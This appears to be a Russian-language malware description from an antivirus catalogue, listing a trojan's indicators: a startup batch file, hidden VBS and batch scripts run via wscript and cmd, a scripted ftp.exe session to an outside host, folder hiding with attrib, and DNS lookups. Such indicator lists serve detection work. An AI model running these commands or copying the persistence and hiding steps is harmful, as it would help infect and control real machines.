Техническая информация
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\windows.bat
- <SYSTEM32>\wscript.exe C:\hidden2\hid.vbs C:\hidden2\go.bat
- <SYSTEM32>\cmd.exe /c ""C:\hidden2\go.bat" "
- <SYSTEM32>\ftp.exe -i -n -s:C:\hidden2\a.src cheapndiscreet.com
- <SYSTEM32>\attrib.exe +H C:\hidden2
- <SYSTEM32>\wscript.exe C:\hidden2\hid.vbs C:\hidden2\x.bat
- <SYSTEM32>\cmd.exe /c ""C:\hidden2\x.bat" "
- C:\hidden2\hid.vbs
- C:\hidden2\x.bat
- C:\hidden2\go.bat
- C:\hidden2\<Имя вируса>.exe
- C:\hidden2\a.src
- 'localhost':1037
- 'ch####discreet.com':21
- DNS ASK ch####discreet.com